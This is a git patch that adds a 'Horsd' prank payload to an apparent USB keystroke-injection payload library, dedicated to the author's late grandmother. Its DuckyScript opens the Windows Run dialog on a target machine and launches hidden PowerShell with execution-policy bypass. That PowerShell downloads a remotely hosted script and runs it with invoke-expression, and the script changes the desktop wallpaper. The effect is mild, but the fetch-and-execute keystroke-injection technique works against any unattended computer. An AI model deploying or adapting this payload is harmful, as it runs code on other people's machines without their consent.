From 3764def08d3275e14ad43859c38178c1725d954d Mon Sep 17 00:00:00 2001
From: Rayden <66985140+MocconaCoffee@users.noreply.github.com>
Date: Wed, 10 May 2023 04:30:53 +1000
Subject: [PATCH] Commit Horsd payload

---
 payloads/library/prank/Horsd/README.md   |  3 ++
 payloads/library/prank/Horsd/horsd.ps1   | 18 ++++++++++++
 payloads/library/prank/Horsd/payload.txt | 36 ++++++++++++++++++++++++
 3 files changed, 57 insertions(+)
 create mode 100644 payloads/library/prank/Horsd/README.md
 create mode 100644 payloads/library/prank/Horsd/horsd.ps1
 create mode 100644 payloads/library/prank/Horsd/payload.txt

diff --git a/payloads/library/prank/Horsd/README.md b/payloads/library/prank/Horsd/README.md
new file mode 100644
index 0000000..8b719cb
--- /dev/null
+++ b/payloads/library/prank/Horsd/README.md
@@ -0,0 +1,3 @@
+# Horsd - In memorium to my Nan
+Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
+** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.
\ No newline at end of file
diff --git a/payloads/library/prank/Horsd/horsd.ps1 b/payloads/library/prank/Horsd/horsd.ps1
new file mode 100644
index 0000000..88903ed
--- /dev/null
+++ b/payloads/library/prank/Horsd/horsd.ps1
@@ -0,0 +1,18 @@
+$Image="%UserProfile%/horse.jpg"
+$code = @' 
+using System.Runtime.InteropServices; 
+namespace Win32{ 
+    
+     public class Wallpaper{ 
+        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
+         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
+         
+         public static void SetWallpaper(string thePath){ 
+            SystemParametersInfo(20,0,thePath,3); 
+         }
+    }
+ } 
+'@
+
+add-type $code 
+[Win32.Wallpaper]::SetWallpaper($Image)
\ No newline at end of file
diff --git a/payloads/library/prank/Horsd/payload.txt b/payloads/library/prank/Horsd/payload.txt
new file mode 100644
index 0000000..0f5225e
--- /dev/null
+++ b/payloads/library/prank/Horsd/payload.txt
@@ -0,0 +1,36 @@
+REM Title:         Horsd
+REM Author:        MocconaCoffee
+REM Description:    A simple script that will change the users wallpaper to Brown Horse that is running.
+REM Dedicated to:   This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
+REM Target OS: Windows 10
+REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
+
+DELAY 3000
+GUI r
+DELAY 300
+STRING powershell
+ENTER
+DELAY 300
+STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
+ENTER
+DELAY 100
+STRING exit
+ENTER
+DELAY 1000
+GUI r
+DELAY 300
+REM ### REQUIRES CONFIGURATION ###
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <your own hosted link here>/horsd.ps1?dl=1; invoke-expression $pl
+REM ### ---------------------- ###
+ENTER
+DELAY 1000
+GUI r
+DELAY 300
+STRING powershell
+ENTER
+DELAY 300
+STRING Remove-Item horse.jpg
+ENTER
+DELAY 300
+STRING exit
+ENTER
\ No newline at end of file